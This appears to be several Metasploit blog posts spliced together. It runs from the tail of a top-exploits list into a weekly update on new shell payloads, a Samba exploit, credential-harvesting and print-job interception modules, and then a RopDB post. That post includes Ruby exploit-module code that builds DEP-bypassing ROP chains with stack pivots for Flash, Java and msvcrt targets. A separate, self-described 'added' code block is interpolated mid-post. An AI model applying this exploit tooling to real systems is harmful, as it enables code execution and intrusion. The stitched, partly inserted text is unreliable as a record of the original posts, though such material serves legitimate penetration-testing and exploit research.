8. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It's not sexy, but it's super handy for testing payloads and setup. Even though it's a lowly #8, I'd bet it's the most-used module in classroom and test environments. More on this topic at the National Vulnerability Database. Down two places from #6 since last month.

9. Apache mod_isapi <= 2.2.14 Dangling Pointer: Another returning module from April, although why this one's back is a bit more of a mystery. Although this is an exploit in Apache, don’t be fooled! It’s only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module’s release), and it’s only a DoS. Again, kind of a mystery as to why it’s so popular. Returning entry from the April Top 10 Exploits.

10. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop: The third April comeback module, and still not sure why this module is popular -- it’s a client side DoS. Historically, it’s a neat DoS, since it demos a bug in Windows 7’s kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you. Returning Entry from the April Top 10 Exploits.

 

If you want to use any of these exploits right now, you can download Metasploit for free!

This update has something for everyone -- new exploits, new auxiliary modules, new post modules, and even new payloads. If quadfecta is a word, we totally hit it this week!

 

More Mac OSX 64-Bit Payloads

 

The parade of OSX 64-bit payloads continues, with five new 64-bit payloads added this week:

 

  • modules/payloads/singles/osx/x64/say.rb
  • modules/payloads/singles/osx/x64/shell_find_tag.rb
  • modules/payloads/stagers/osx/x64/bind_tcp.rb
  • modules/payloads/stagers/osx/x64/reverse_tcp.rb
  • modules/payloads/stages/osx/x64/dupandexecve.rb

 

Nemo was responsible for last week's new 64-bit payloads, so huge thanks again to him for continuing to fill out Metasploit's payload offerings for Apple platforms. I'm looking forward to seeing how this whole OSX-as-a-target theme unfolds.

 

Exploit for Samba ZDI vulnerability

 

It's always handy to have fresh Samba exploits -- in local area networks, Samba is often found as a core intranet service so people in different organizations can easily share files across platforms. So, targets running Samba tend to be pretty high-value for pen-testers. Thanks especially to blasty, from whom Metasploit was able to port the exploit. If this attribution isn't correct, then I'm sure someone will let us know. (:

 

This particular vulnerability was apparently reported initially via TippingPoint's ZDI program back in March and fixed in April. So, while this isn't an 0-day in any meaningful sense, a reliable Samba exploit is still technically difficult to pull off.

 

Local enumeration modules

 

This update features a couple of local enumeration post modules by community contributor Barry Shteiman. The first, enum_db, goes through the Windows registry to pick up all kinds of information about all kinds of databases -- specifically, Oracle, Microsoft SQL, MySQL, and Sybase. The second paws through local installations of Apache Tomcat, and can turn up usernames, passwords, and roles, since they're stored in the clear in a known location. These are very typical post-exploit chores, so automating this kind of thing as a post module is hugely useful. Thanks Sectorix!

 

Print Job Hijinks

 

Finally, we have a new auxiliary module, printjob_capture, from long time Metasploit contributor Chris John Riley. I kind of fell in love with this module when it popped up in our pull queue, and immediately set about stealing print jobs here in the Metasploit office (with permission, of course). It's great fun and totally spooky -- you end up saving off a copy of the print job in an easy-to-read PS format, then handing off the print job to the real printer. The victim, of course, is none the wiser. I'm working up a screencast of this module in action, since producing a print job as it comes off the tray of a real printer has some pretty excellent theatrical value.

 

New Modules

 

All in all, not a bad haul -- here's the breakdown with the links to Metasploit's Exploit Database.

 

Exploit modules


Auxiliary modules


Post modules

 

It's not all gem updates, of course. We have a smattering of new modules for you, too. For details and usage on these, just follow the links to our Exploit Database.

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Data Execution Prevention (DEP) has always been a hot topic in modern software exploitation.  This is a security feature implemented in most popular operating systems, designed to prevent a program from executing code in a non-executable memory location.  So when an exploit injects a payload into memory and tries to run it from a non-executable page, execution faults and the process simply crashes.  But here's the thing: although DEP plays an important role in your computer's countermeasures, it is not without a kryptonite.  When researchers such as Hovav Shacham introduced the Return-Oriented Programming (ROP) technique, which reuses existing executable code fragments ("gadgets") instead of injecting new code, it pretty much became the standard way to bypass DEP, and is still in use today.

 

However, when done manually, ROP can be a time-consuming task, sometimes painful.  A couple of years ago, if you were able to ROP anything, you were a ROP star!  As the technique became more well-understood by the general exploit dev community, tutorials and better tools were written to collect gadgets in order to speed up exploit development, and then ROP was a bit easier.  Eventually, Peter Van Eeckhoutte created mona.py to automate ROP generation -- getting a ROP chain done can be as simple as typing: "!mona rop".  Nowadays, many Metasploit modules (especially the browser ones) are just copy-and-pasting the same ROP chains to get code execution... but what's the point of repeating the same code over and over again?  The new RopDB mixin puts an end to that.

 

Metasploit RopDB addresses these needs based on our development habits:

  • Allow more reusable ROP chains in browser exploit development.
  • Allow the two common ways of knowing a module's base address: non-ASLR plugins (fixed base), or info leaks (base supplied at runtime).
  • Simplify ROP maintenance.

 

The RopDB Database

 

There are mainly two components: the database, and the mixins.  The database itself consists of multiple XML files that store battle-ready ROP chains, each for a specific DLL.  The XML structure was shown in a screenshot in the original post:

 

[Screenshot: RopDB XML structure (Screen shot 2012-10-02 at 12.07.20 PM.png)]

 

A "gadget" entry in this case serves one of two different purposes, depending on which attribute it carries:

  • "offset" - This stores the gadget's actual offset from the DLL's base address; the mixin adds the base to it at generation time.
  • "value" - This stores an integer that's not an address (offset), or a symbol, which will be converted to an integer during payload generation.  These are the symbols the mixin supports:
    • "nop" - A NOP
    • "junk" - 4 bytes of junk
    • "size" - The payload size
    • "size_negate" - The negated payload size, for ROP chains that use the "NEG" instruction to recover the payload size.

 

The RopDB Functions

 

Now, let's talk about the API.  There are three functions you can use in an exploit:

  • generate_rop_payload() - This is used when the exploit does not have to modify the ROP chain at all.  It will generate a ROP payload in the following layout, with the stack pivot optional (in case you need to put it somewhere else):

[ Stack Pivot ] [ ROP Chain ] [ Payload ]

 

  • select_rop() - This is used in case the exploit needs to modify the ROP chain more freely.  When select_rop() is used, you're basically overriding rop_payload() too in order to build the payload.
  • has_rop?() - This is used in case you need to check if a ROP chain is actually available before picking one.
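To make the database layout and the three mixin functions above concrete, here is an added, stand-alone example (not code from the Metasploit tree and not the real Msf::Exploit::RopDb mixin): a miniature RopDb that parses a constructed XML chain, rebases the "offset" gadgets, resolves the "value" symbols (nop, junk, size, size_negate) against the payload, and lays the result out as stack pivot + ROP chain + payload. The element names <db>, <rop>, <compatibility>/<target> and <gadgets base=...>, the gadget offsets, and the concrete dwords chosen for "nop" and "junk" are assumptions made for this illustration; only gadget/offset/value, the four symbols, and the pivot/target/base options come from the post.

```ruby
require 'rexml/document'

# Constructed sample chain (offsets and element names are made up for this
# illustration; only gadget/offset/value and the four symbols follow the post).
SAMPLE_XML = <<~XML
  <db>
    <rop>
      <compatibility><target>11.3.300.268</target></compatibility>
      <gadgets base="0x20000000">
        <gadget offset="0x00001111">POP EAX # RETN</gadget>
        <gadget offset="0x00002222">ptr to VirtualProtect()</gadget>
        <gadget offset="0x00003333">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
        <gadget value="size">dwSize (payload length)</gadget>
        <gadget value="size_negate">-dwSize, for chains that NEG it back</gadget>
        <gadget value="0x40">flNewProtect = PAGE_EXECUTE_READWRITE</gadget>
        <gadget value="junk">filler dword</gadget>
        <gadget value="nop">NOP dword</gadget>
      </gadgets>
    </rop>
  </db>
XML

# Minimal stand-in for the mixin's lookup-and-resolve step. Method names mirror
# the post's API; the bodies are this example's own.
class MiniRopDb
  NOP_DWORD = 0x90909090 # assumed encoding of the "nop" symbol

  def initialize(xml)
    @doc = REXML::Document.new(xml)
  end

  # has_rop?: is there a chain compatible with this target version?
  def has_rop?(target = nil)
    !find_chain(target).nil?
  end

  # select_rop: the chain as an array of dwords, rebased and with symbols
  # resolved against the payload. Returns nil when no chain matches.
  def select_rop(payload, target: nil, base: nil, junk: 0x41414141)
    rop = find_chain(target)
    return nil unless rop
    gadgets = REXML::XPath.first(rop, 'gadgets')
    base ||= Integer(gadgets.attributes['base'])   # rebase for info-leak cases
    REXML::XPath.match(gadgets, 'gadget').map do |g|
      if (off = g.attributes['offset'])
        (base + Integer(off)) & 0xffffffff
      else
        resolve_symbol(g.attributes['value'], payload, junk)
      end
    end
  end

  # generate_rop_payload: [stack pivot][ROP chain][payload], pivot optional.
  def generate_rop_payload(payload, target: nil, base: nil, pivot: '')
    chain = select_rop(payload, target: target, base: base)
    raise ArgumentError, "no ROP chain for target #{target.inspect}" unless chain
    pivot.b + chain.pack('V*') + payload.b
  end

  private

  def find_chain(target)
    REXML::XPath.match(@doc, '/db/rop').find do |rop|
      versions = REXML::XPath.match(rop, 'compatibility/target').map(&:text)
      target.nil? || versions.include?(target)
    end
  end

  def resolve_symbol(value, payload, junk)
    case value
    when 'nop'         then NOP_DWORD
    when 'junk'        then junk
    when 'size'        then payload.bytesize
    when 'size_negate' then (-payload.bytesize) & 0xffffffff
    else Integer(value)            # plain literal such as "0x40"
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  db = MiniRopDb.new(SAMPLE_XML)
  chain = db.select_rop('A' * 0x300, target: '11.3.300.268')
  puts chain.map { |d| format('0x%08x', d) }.join(' ')
end
```

Note that dwSize and its negation are computed from the payload actually handed in, which is why the mixin needs the encoded payload before it can emit the chain; passing a base address overrides the one recorded in the XML, the same idea as the 'base' option in Example 3 below.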

 

Code Examples

 

1. Generating a basic ROP payload

 

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "RopDb Example 1",
      'Description'    => %q{RopDb Example 1},
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     => [ [ 'URL', 'http://metasploit.com' ] ],
      'Platform'       => 'win',
      'Targets'        => [ [ 'Automatic', {} ] ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 2 2012",
      'DefaultTarget'  => 0))
  end

  def exploit
    # This will generate a payload including our Java ROP
    rop_payload = generate_rop_payload('java', payload.encoded)

    # Print out the payload for inspection
    print_line(Rex::Text.to_hex_dump(rop_payload))
  end
end





 

 

2. Select a ROP chain, and then modify it

 

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "RopDb Example 2",
      'Description'    => %q{RopDb Example 2},
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     => [ [ 'URL', 'http://metasploit.com' ] ],
      'Platform'       => 'win',
      'Targets'        => [ [ 'Automatic', {} ] ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 2 2012",
      'DefaultTarget'  => 0))
  end

  def exploit
    # Pick the msvcrt chain so we can edit it before building the payload
    rop = select_rop('msvcrt')

    # Modify dwSize for VirtualProtect()
    rop[0] = 0x00000300

    # Print the ROP chain for inspection
    print_line(Rex::Text.to_hex_dump(rop))
  end
end





 

3. Generate a ROP payload with a specific target version, a different base address, and a stack pivot:

 

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "RopDb Example 3",
      'Description'    => %q{RopDb Example 3},
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     => [ [ 'URL', 'http://metasploit.com' ] ],
      'Platform'       => 'win',
      'Targets'        => [ [ 'Automatic', {} ] ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 2 2012",
      'DefaultTarget'  => 0))
  end

  def exploit
    # Stack pivot that lands ESP on our ROP chain; prepended to the chain
    pivot = [
      0x20004171, # POP EDI # POP ESI # RETN (1e0d0000)
      0x0c0c0c0c,
      0x2001d755, # xchg eax, esp # ret (1e0d0008)
    ].pack("V*")

    p = payload.encoded

    # Select the Flash chain for this exact version, rebased to 0x20000000
    rop_payload = generate_rop_payload('flash', p, {'pivot'=>pivot, 'target'=>'11.3.300.268', 'base'=>0x20000000})

    print_line(Rex::Text.to_hex_dump(rop_payload))
  end
end





 

 

If you're new to Metasploit module development, please also check our Metasploit Development Environment for tips on setting that all up, and then get ROPpin' like a ROP star.

 

===

UPDATE:

  • Oct 4th 2012 - mona.py now supports RopDb database XML format.
